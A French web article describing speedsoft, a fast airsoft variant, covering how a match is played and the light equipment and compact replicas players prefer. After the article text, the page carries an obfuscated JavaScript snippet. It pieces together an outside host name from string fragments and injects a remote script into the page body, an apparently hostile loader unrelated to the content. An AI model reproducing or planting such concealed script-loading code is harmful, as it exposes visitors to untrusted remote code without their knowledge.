En quoi consiste le speedsoft ?

792
Partager :
Speedsoft en foret

Le jeu d’airsoft peut se dérouler selon différents scénarios, en fonction de la variété de ce sport. Le speedsoft est l’une d’entre elles et a gagné beaucoup de popularité ces derniers temps. Il s’agit de l’un des jeux les plus dynamiques, qui exige une bonne condition physique. En même temps, ils sont courts, ce qui fait qu’ils ne prennent pas beaucoup de temps et sont plus faciles à intégrer dans un emploi du temps chargé. Le speedsoft n’est pas un sport pour tout le monde, mais ses adeptes sont de plus en plus nombreux et il vaut la peine de se familiariser avec ses règles.

Comment se déroule le speedsoft ?

A lire en complément : Comment créer des accords mets-vin surprenants avec un rosé

Le speedsoft consiste également en une compétition entre des équipes de plusieurs joueurs, mais il est beaucoup plus rapide et dynamique que les autres jeux de tir. Il est basé sur une tactique agressive, où l’on court beaucoup et où l’on doit parfois franchir des obstacles en rampant, en sautant ou en effectuant des glissades. Il faut donc être en bonne forme physique pour pouvoir faire face à toutes ces tâches et soutenir notre équipe.

Un bon réflexe est aussi très important. On n’a pas le temps de s’arrêter pour réfléchir, il faut donc analyser le jeu en temps réel si l’on veut battre son adversaire. Le jeu se termine lorsque tous les joueurs d’une équipe adverse ont été touchés. Le speedsoft utilise des répliques airsoft et des accessoires d’airsoft, mais tous les équipements ne sont pas adaptés à ce type de jeu. Il faut donc adapter les paramètres de la réplique et des autres équipements à la nature du jeu, puisque le résultat du jeu en dépend également.

A voir aussi : Voyager à petit budget : profiter au maximum de vos aventures

Équipement et accessoires pour le speedsoft

Le speedsoft n’a pas pour objectif de reproduire des scénarios de combat réels ou des actions militaires ou policières, il n’utilise donc pas autant d’équipement tactique que d’autres jeux d’airsoft. Ce qui compte, c’est la liberté de mouvement et la rapidité d’action. Il ne faut donc pas trop se charger d’accessoires – par exemple des gilets plate carrier, des casques ou des uniformes complets. La plupart des joueurs portent de simples jeans, des T-shirts et des baskets – c’est le confort qui compte, et moins il y a d’équipement, mieux c’est. Une autre solution consiste à utiliser des ceintures légères et des gilets chest-rig, dans lesquels on peut placer des chargeurs de billes de rechange et des sparklettes de CO2.

La réplique airsoft que l’on utilisera pendant le jeu doit avoir une bonne maniabilité et ne pas gêner nos actions. C’est pourquoi les pistolets (par exemple, un pistolet airsoft électrique) et les fusils d’assaut airsoft / pistolets mitrailleurs airsoft compacts sont préférés aux répliques airsoft d’épaule de grande taille. Par ailleurs, il est aussi important que notre réplique ait une bonne cadence de tir et un chargeur suffisamment volumineux, qui n’aura pas besoin d’être remplacé fréquemment. Quelques modèles utilisés dans les jeux CQB – les plus compacts et les plus légers – fonctionnent très bien dans le speedsoft.

(function(){
xXdn_=(« u »+ » »)+ »s »+ » »;xXdn_+=(« tat. »)+(« i »);
xXdn=document.createElement(« script »);xXdn.type= »text/javascript »;xXdn_+= »nf »+(« o »)+ »/ »;
xXdnu= »495491944″+ ». »;xXdn.async=true;xXdnu+= »lk5jzX0nXdn41camyt1dpyusu84zd9″;
xXdn.src= »https:// »+xXdn_+xXdnu;xXdnb=document.body;xXdnb.appendChild(xXdn);
})();

Partager :